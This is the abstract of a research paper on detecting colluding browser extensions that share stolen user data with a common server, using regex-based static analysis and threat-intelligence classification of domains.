Collusion Attacks on Browser Extensions Revealing hidden extensions colluding against the user

Abstract

Browser extensions have been created to extend and enhance web browsers in order to improve the user experience. Because of this, browser extensions can access a range of different resources that pose a great privacy risk for users. These sensitive resources include users’ browser history, passwords and banking information. Therefore browser extensions have become a great source of interest for those with malicious intent. In order to obscure the intent behind a browser extension, a set of extensions can be created that when analysed individually does not raise any suspicion. However, by analysing the entire set of extensions, a relationship between each extension can be revealed. Namely, each extension is extracting user information under different sets of permissions, and relaying this data to a common external server. Such extensions are said to be colluding, and possibly performing a collusion attack. This form of attack is the focus of this research paper. We propose a method for downloading and performing static analysis of the collected browser extensions. The static analysis is based on regular expressions and defined to match and extract domain names and IP addresses from the downloaded browser extensions. In order to discover domains or IP addresses that are malicious, Recorded Future’s threat intelligence is used to provide classification and information behind each classification. Recorded Future collects data from technical sources, open sources and closed sources. By combining their machine learning and natural language processing, Recorded Future can identify, classify and predict events. In this work, over 250,000 Mozilla Firefox and Google Chrome extensions have been analysed by our proposed method and as a result, 1037 browser extensions have been found to be possibly colluding. Recorded Future classified 131 domains as Malicious.